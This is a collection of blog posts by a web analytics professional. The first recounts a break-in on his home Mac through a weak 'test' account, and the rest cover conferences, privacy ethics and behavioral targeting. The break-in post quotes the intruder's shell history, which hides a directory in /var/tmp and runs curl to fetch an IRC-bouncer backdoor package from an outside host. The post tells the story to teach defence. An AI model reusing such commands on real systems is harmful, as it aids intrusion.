The Break-in

The Scary Door by musicalwds

I am so ashamed.

I was once a system & network manager, so I know about things like bad passwords and scanning software. Later, I built firewalls for Sun. Lately I’ve lectured on the importance of locking down your web analytics data, and the precautions you need to take. So imagine my shock to discover that my home desktop Mac was broken into. Yep. I had enabled remote logins through my firewall, which is innocent enough, but during a fit of debugging some USB problems, I set up new user named “test” with a password of .. you guessed it. I remember at the time thinking “don’t pick ‘test’ as a user name, and certainly don’t use it as the password” but I was in a hurry and I did it anyway. I finished my debugging, but forgot about the account.

Oh, and of course, I set it up with full administrator privileges.

Tonight I’m poking through my log files (I’m still debugging for the source of this USB error on my system, it’s driving me nuts), and I notice that some scanning software came by today, trying to log into zillions of accounts. I was smugly scrolling through the list of user names it was trying until I got to “test” and … it didn’t log in. It didn’t know the password. I first thought, holy crap, I left that account enabled. Then I thought, how could it not guess the password?

The reason: because somebody else had, three days ago. And changed it.

I brought up a Terminal window, and typed “last test” which gives me a list of the previous logins. Sure enough, some fine program/human had logged in to my system three days ago, and stayed for 1 minute. So I went to the “test” home directory, where I conveniently found a list of what happened when they logged in:

1. w
2. passwd
3. uname -a
4. exit
5. cd /var/tmp
6. mkdir " "
7. cd " "
8. curl -O geocities.com/myhael_ilie/psyd,tar.gz
9. curl -O geocities.com/myhael_ilie/psyd,tar.gz
10. exit

Translation:

  1. See who’s on.
  2. Change the password for user “test”.
  3. See what kind of system this is.
  4. Logout.
  5. Go to a folder commonly used for temporary files.
  6. Create a folder named ” ” (just a single space).
  7. Change to that folder.
  8. Download a file from the web.
  9. Try the download again.
  10. Give up, and log out.

So why did the curl commands fail? It’s because I use Little Snitch, which asks my permission every time a random command tries to access the Internet. Since I wasn’t at the computer at the time, I never gave my OK, and Little Snitch prevented the ‘curl’ from working. The person would have seen this:

curl: (7) Failed to connect to 66.218.77.68: Host is down

So what was in psyd,tar.gz? Well, actually it’s a typo. The real name doesn’t have a comma in it, but the person who logged in didn’t notice the mistake because of the “host is down” message. I grabbed the correct file and took a look at it. It is psyBNC, an “IRC bouncer”, but can be used to install backdoors and other nastiness. The file contains the complete source code, as well as a fully-functioning Mac executable.

Fortunately, that’s the end of the story. Several lessons here, ones which I’ve told others far too many times:

  1. Do what you can to prevent break-ins.
  2. Log everything so you can figure out how the inevitable break-in happened.
  3. Convenience is often at the expense of security

I was incredibly lucky. A simple sudo bash would have given this person root access, and they could have erased everything on my system, or worse. In fact, they could have, and then erased all traces of what they did, but I have enough logging and checks to know that they didn’t do anything but what’s described above.

I humbly admit all of this in the hope that you can learn from my near miss.

And yes, I removed the “test” account.

The Break-in

The Behavioral Targeting Penguin

Behavioral PenguinHi kids! Today the cute and cuddly Mr. Penguin from AOL will answer all your questions on behavioral targeting! Isn’t he cute! Now you know that behavioral targeting is your friend!

Have a good day! And a tip o’the cap to the Good People at AOL who keep Mr. Penguin in anchovies in return for a little education gig he does for them.

PS oh, and did you know that Google doesn’t track you around the web? Hahahahahahaha!

PPS Seriously, why doesn’t AOL focus on the benefits of BT — like that the ads you’ll get are actually relevant? I am also concerned that they are confusing BT with tracking across an ad network. They are not the same. As it is, what I see from the storyboard is I get a TRACKING COOKIE ON MY COMPUTER followed closely by somebody thinking “I should remove that cookie”… is BT the new cookie? Is the cookie the new cookie?

The Behavioral Targeting Penguin

Notes on Emetrics Summit San Francisco 2007

Another Emetrics has come and gone. Many of the Summit’s highlights have been presented in other blogs, but I did want to point out a few personal observations:

Big News and Rumors: Eric Peterson strikes out on his own, a new Google Analytics, and WebSideStory changes its name to Visual Sciences. But the biggest question I kept getting was “how do you feel about having to work for Microsoft?”

Attendees: Wow. There were a lot of people. Many faces from Emetrics Santa Barbara 2005 and 2006, but lots of new faces as well. The surge in attendees meant I was running into a lot of people new to web analytics, but I also took note of people representing sub-specialties such as SEO and SEM, now as legitimate peers of web analytics. I don’t remember the number of attendees, but there’s no way all of us would have fit in the Four Seasons in Santa Barbara.
Emetrics Crowd
Kudos to Jim Sterne for having the foresight to move the Summit to a larger venue this year. The Palace Hotel kept up the high standards.

Hiring! Anyone who was hiring stuck a green dot on their badge. There were LOTS of green dots. If you’re interested in web analytics, it seems there’s a job for you, somewhere!
Emetrics SF Badge
Special thanks to Eric Peterson for announcing on stage that the Yahoo! data team is looking to hire over 120 people. Eric, I owe you one – or several. For everyone else .. send resumes!

Vendors: All the vendors you’d expect were there, showing their latest. One vendor was even promoting a sniffer technology, so you didn’t have to manually tag pages – wow! Unlike Santa Barbara, where the vendors were in the same room as the presenters, in SF there was a separate “vendor room.” That increased the times available for product demos, but it did mean attendees needed to make a special trip to the room. The genius move was to put the mid-morning and mid-afternoon snacks at the back of the vendor room, which no doubt increased traffic.
Emetrics SF Vendors
And no, the floor wasn’t really sloped.

Blogger’s Lunch: Unfortunately I was on conference calls until 1:30 Monday, so I missed the blogger’s lunch table. In fact, I missed lunch… and Jim’s keynote…

Google Analytics: You’ve no doubt already seen the buzz about the new Google Analytics. What you probably don’t know is that Jeffrey Veen gave a really great presentation. It took him a while to get his Mac projecting, but Brett Crosby did a good tap dance, and the eventual presentation was well worth it. I don’t know if he was using PowerPoint or Keynote or what, but the screen animations looked like somebody offscreen was doing a live demo.
Jeff Veen demos Google Analytics
After the presentation, I asked Somebody Who Would Know about MeasureMap, the blog analytics technology Google bought and then seemed to bury. Did the new Google Analytics contain all that MeasureMap goodness? With a wink and a smile, I was told that MeasureMap isn’t dead, but I got the impression that if I was told more, I would have to be killed. So I got a Google Analytics T-shirt instead.

The Sessions: Of course the sessions are the reasons most people go to Emetrics. As usual, some of them were fabulous and others were take-it-or-leave-it. Unlike previous years, there were so many presenters that much of the summit ran in four tracks. That made it a bit of a challenge to get to every talk I wanted to see. However, four presentations stood out for me.

First was Bryan Eisenberg‘s Persuasion Architecture talk. I love how Bryan brings reality into analytics. Persuasion Architecture focuses on outcomes, not activities. Amen to that!

Second was Joseph Carrabis‘ talk “Quantifying and Optimizing the Human Side of Online Marketing.” Honestly, the title sounded a bit dry and I wasn’t sure why I wandered into that particular room. (I’m sure Joseph could say!) But immediately, I was captivated. First, you need to understand that this talk had nothing to do with web analytics. Second, Joseph comes across like Robin Williams as a professor — he read his material from a script, but packed so many asides and ad libs into the presentation — all relevant — that it was fascinating to witness. He had five points to make, and after 50 minutes, had only covered the first two. He asked the crowd which of the final three we’d like him to cover, and everybody said “all of them! We’ll stay!” Keep in mind, this was the last session of the day and people were getting ready for Web Analytics Wednesday (read: free drinks). That’s how good he was – everyone stayed another 30 minutes. Since returning from the Summit, I’ve been looking up Joseph’s other writings, and my hope is to have him come speak at Yahoo! sometime.

Aside: check out the game. I have no idea what this is, but I hope one day Joseph reveals his findings.

Third was a talk from Seth Romanow and Chris Worland from Microsoft where they coined the term “personamous” to talk about personalized content to anonymous visitors. (During the talk, Seth said personamous.com was still available. A week later as I write this summary, it’s still available.) The reason why this session stood out for me was that they had three main lessons. Two of them (stuff interest/activity data in the cookie, rather than in a central database, and avoid a recommendation engine) were the opposite of what Yahoo! does. My hope is that they came to the conclusions they did based on the the time and available resources to get the job done. Yahoo!’s been doing this for 12 years, so we may be talking on a very different time/resource/focus scale.

Finally, Tim Hart of the J. Paul Getty Trust really nailed how web analytics can help you align your web site with your mission. While he was presenting, I was reminded of Xavier Casanova’s presentation last year where he used web analytics to help his startup figure out positioning, messaging and buzz.

Privacy / Ethics: I had more than a handful of people tell me they’ve been thinking about ethics of web data. During the WAA meeting on Sunday, Jim Sterne made a call for a WAA Ethics Task Force. Alex Langshur and I talked about how important privacy guidelines were to the public sector web sites – something I hadn’t previously considered. René Dechamps Otamendi brought in the European angle. I’m very glad to see an increased level of awareness and interest — and I’m looking forward to additional discussions.

Web Analytics Wednesday (on Tuesday): There was a great turnout for Web Analytics Wednesday, the social event for web analytics geeks – you know who you are. More recruiting ensued…. a number of us then migrated to the WAW after-party, which meant actually leaving the hotel. I don’t think we lost too many people along the way.

There’s an unwritten law that any post about Emetrics has to have a photo of either Jim Sterne or Eric Peterson. Since I mentioned Jim’s “Godfather” video already, and because Eric’s now on his own, here’s Eric, wondering when Andy Benkert (center) and I are going to get the hell out of the doorway:
Bob Andy and Eric at Emetrics WAW
The sign on Andy reads: “Web Analytics Wednesday (on Tuesday) After Party.” Many thanks to June Dershewitz for organizing this WAW!

It was great to meet and/or re-meet so many people. The LinkedIn connections are flying, so we’ll all stay in touch — at least until October, when Emetrics moves to Washington DC.

Other Emetrics summaries (list is in no way complete):

Notes on Emetrics Summit San Francisco 2007

Protecting Citizens’ Private Data

Fed 06 Report Card
USA Today is running a couple of opinion pieces, one (apparently staff-written) questioning how well the US government is doing with information security, and calling for more accountability. The report card recently issued by Rep. Tom Davis, R-Va., of the House Oversight and Government Reform Committee, doesn’t look so good. The opinion piece concludes that while the Office of Management and Budget (OMB) is trying to lock things down through stricter process, things are going to get worse.

Meanwhile, a rebuttal from Clay Johnson, deputy director for management of the OMB, says the government is “significantly strengthening the protection of citizens’ personal data” by asking the agencies to police themselves, and running a consumer awareness campaign.

Last month, the Identity Theft Task Force issued a Strategic Plan. You can read the plan and supplemental materials on the Task Force web site.

Protecting Citizens’ Private Data

Lars Johannson: Some Good Interviews

Lars Johansson, the Swedish coordinator for the WAA, has a web site and blog. One interesting thing he does is ask questions of different people who are involved in the Web Analytics field, and publish the conversation on the site.

Today, Lars posted a batch of new interviews, including Phil Kemelor regarding industry differences across the pond, Avinash Kaushik about his book, and yours truly about web analytics ethics.

Don’t miss the Jim Sterne video!

Lars Johannson: Some Good Interviews

Web Analytics Ethics

Two years ago, sitting in the airplane after attending Emetrics 05 Santa Barbara (and having to leave early), I penned a letter to organizer Jim Sterne, asking him if he’d bring up some issues around web data privacy at the first Web Analytics Association general meeting. Turns out he didn’t get my email until after the meeting, but it resonated with him and he circulated it within the WAA.

Nothing came of that initial email, but Jim didn’t forget it. A year ago, he asked if I’d be interested in a speaking slot at Emetrics ’06 Santa Barbara to talk about web privacy issues, which I gladly accepted. Not only did Jim invite me to speak, he put me on first – presumably in order to help set the tone for the summit. I got a good reception, but again, nothing really came of it.

This year I’ll be at Emetrics 07 San Francisco, and while I’m not speaking, I still think the issue deserves consideration. In fact, I think it’s more front and center than ever, with items such as Google’s recent announcement that they’ll be anonymizing their search logs after 18-24 months.

Against this backdrop, and in the spirit of keeping this alive, here’s the original email I sent to Jim, verbatim:

June 3, 2005, 05:24 AM

Jim -

Greetings from Boston. Thank you for the wonderful Emetrics conference;
it exceeded my expectations and I hated to leave early.

I'm unable to attend the WAA meeting this morning, but I did want to
have you possibly bring up for discussion the role that WAA wants to
play with respect to privacy of data collected/used by the WAA members,
and, in a larger context, some of the ethics around using and
protecting access to the data.

My current mental state (it's 4am California time, and I haven't had
any sleep) prevents me from presenting a coherent case, but here are
some thoughts:

With the recent news on personal privacy leaks, and even Citibank
running ads highlighting identity theft, I suspect it is only a matter
of time before the government decides it's time to step in and
legislate on the issue.  If that happens, I'm convinced that the strong
arm of the legislature will come down with a set of guidelines and
regulations that will rival Sarbanes-Oxley. Just as SOX has spawned an
entire compliance industry (and fattened the wallets of lawyers,
accountants and auditors) and caused a massive re-engineering effort, I
think a parallel will emerge around data access and security - where
procedures need to be meticulously documented, controls need to be put
in place for every piece of data, and systems will need to be built to
audit compliance.

Web analytics as an industry has largely ignored issues of data access,
modification, sharing and integration, having (rightly) focused on
getting the most use of the data.

But there are practical questions to ask. Some examples:

 - if you are surfing books at Amazon and not logged in, and later in
the same visit, you log in and look at kitchen appliances, should
Amazon add to your interest profile the books you searched while logged
out? I think most consumers would say no, they are unrelated.

 - what if you were at Amazon putting books in your shopping cart, and
then went to check out and said "yes, I have an account"? I think most
consumers would say yes, the convenience is worthwhile.

 - if you are searching Yahoo Personals and not logged in, and later
log in to read your Mail, should Yahoo add to your interest profile the
personal ads you looked at while logged out?

I think most users expect that logged out behavior is treated
differently at Yahoo (in fact, Yahoo's privacy policy mandates it), but
where is the line?

 - should consumers have access to the information collected about
them?  Can they opt-out of such collection, or change the data? How
would one control access (and make sure we were showing information
only to the correct people)?

 - should data collection policies (e.g. downloadable toolbars, "web
accelerator" proxies, etc) default to "opt-out" for data collection,
and have consumers explicitly opt-in before data can be collected?

 - should there be an acceptable use policy for cookies?  e.g.
duration, standard naming convention describing use, when cookies
should not be used, when cookie data should be encrypted, etc?

 - how do these policies impact targeting, computation of unique users,
visit lengths, user value, etc?

 - how long should we keep data about users?

These issues impact all of the WAA: advocacy, technology, education,
standards, research, etc.  These kinds of questions guide what the WAA
does, and should "baked in" to the DNA of the organization. Thus I
think it's appropriate to have a discussion about it.

I've spoken with several people about this issue, and the immediate
reaction is that this is a job for lobbyists. I don't agree. The WAA
advocacy team will no doubt do a fine job lobbying lawmakers on best
practices, once the Association formulates its stance.

However, any
data privacy laws that governments may pass will only be the lowest
bar. While as analysts and marketers, we'd like to see the bar be up to
us to set, I don't think that will last long-term. I think we should
assume that a bar *will* be set. However I don't think that's what we
should shoot for.  Consider - as practitioners, we want to practice
"safe data" and stay above the bar. One way to do that is to layer
policies on top of the laws.  Another is to layer values on top of the
policies.

I suggest that the WAA take up the discussion of what values we stand
for.  Should web analytics practitioners, especially ones that have the
good sense to join the WAA, take an oath similar to the hippocratic
oath that doctors take? Should practitioners be held to an ethical
standard for the privilege of having access to the data?

We are not dealing with life and death issues here, but we are dealing
with issues of trust.  We've seen that one of the reasons we have data
quality issues is that people delete cookies and they delete cookies
because they don't trust web sites to use the cookies responsibly. We
also know that if consumers have more trust, they will use the web
more, and transact more, so it's in our best interests to increase the
trust that consumers feel.

While a larger "data access oath" may be out of scope for the WAA -
indeed, I can see an argument that an umbrella data ethics group emerge
- I don't want to try to boil the ocean. But is it worth having a
discussion about what values the WAA holds, and in turn, expects from
its members?

I look forward to the thoughts that will come out of the meeting.

Bob

PS timely:
http://news.yahoo.com/news?tmpl=story&cid=582&e=1&u=/nm/20050603/wr_nm/tech_privacy_dc

I boiled the essence of this letter into a PowerPoint presentation that I used at Emetrics last year. The presentation is purposefully without any fancy design in order that the message be front and center. You have my permission to do what you want with it. During the Q & A after the talk, I said I could imagine a cataclysmic event that would set into motion things like congressional hearings on data privacy. I referred to it as the Chernobyl of Data. Fortunately, it hasn’t happened, and of course I hope it doesn’t. But I continue to be concerned about a head-in-the-sand mentality within the web analytics community, and what it will ultimately mean once the hammer comes down – in any form.

I’m interested in your thoughts. Is it time to join together as an industry to tackle this?

Web Analytics Ethics

Google Analytics

Somebody asked me for my reaction to the announcement that Google has decided to make Urchin free. I already said it once:

A nice way to get even more off-network data is to supply folks with a hosted analytics service that most small and medium-sized web sites can use. Simply put a web bug / beacon in your page, and we’ll track your visitors for you. And for us.

Google Analytics

Getting something for nothing

Eric offers the advice

Don’t expect something for nothing.

What are surfers willing to do to get personalized content?

In May, ChoiceStream did an email survey of 923 U.S. online adults, and found that consumers want personalized content, but they are wary of using methods like click tracking to inform the personalization. Not only that, but they are less willing to provide information or allow tracking than they were a year ago:
Choicestream Personalization Survey

Not too encouraging. And if 68% of visitors are opposed to using click and purchase tracking in order to provide what many people actually want — personalization — is it any wonder that they don’t see the value in cookies?

Getting something for nothing

Who Are You?

http://www.flickr.com/photos/photojo/27602762/I was recently told

I looked at your ‘about’ page. it’s more about what you do than who you are.

Fair enough, and a good observation. But how does one define who one is? I’m thinking specifically about web analytics and user tracking. We want to provide compelling content (or products, services, etc) that engage users. The best way to do that is to know who they are.

Traditionally, web sites have used several means for determining who you are, including

  • demo- or biographical – age, gender, income, education, etc.
  • attitudinal – what do you think? do you like hockey?
  • geographical – where do you live? work? travel to?
  • behavioral – What do you read? What do you buy? When do you do it?

Of course there are also random factoids, like “what’s your favorite swear word?” Sometimes the answers are insightful, sometimes entertaining, but usually they are of little value.

Back at Accrue, customers and prospects used to ask me if I had recommendations for survey tools, and how to combine log data with registration data, because without them they couldn’t “personalize” the experience for the visitor. At first I was baffled by this, and used to tell a (fictitious) story:

I go to the same coffee shop every morning, and have been doing so for six months. I order roughly the same thing every day. I know the first names of the three servers, and they know my first name, and what I like.

When I go to the coffee shop, they recognize me, they treat me like a valued customer, and they anticipate my desires based on my previous behavior. They never asked me how, and they certainly didn’t follow me around to see where I lived or worked. They just paid attention.

Here’s the thing. What you do is more observable, more accurate, and more informative than your answers to a registration or survey form. If you’ve ever heard the phrases “do what you say you will do” or “actions speak louder than words” then you know what I’m talking about. And yet I see registration forms on web sites when there’s no good reason to have them. My guess for these are three-fold:

  1. Some of these web sites are run by folks that have come from the offline media, where behavioral tracking is impossible, so they don’t think about it.
  2. Some of these web sites don’t have useful behavioral tracking, so are trying to make up for it by asking you tons of demographic questions.
  3. Some of these web sites have wonderful tracking, but no way to act on the data they collect. In short, they can’t personalize, or target, based on behavioral data.

Of course getting things in balance is key. I buy everything with one credit card. But if my credit card company started sending me very personalized offers based on my behavior, I might get freaked out about the privacy implications, and start using other credit cards, or paying with cash. So I want you to pay attention, but not too much.

Who Are You?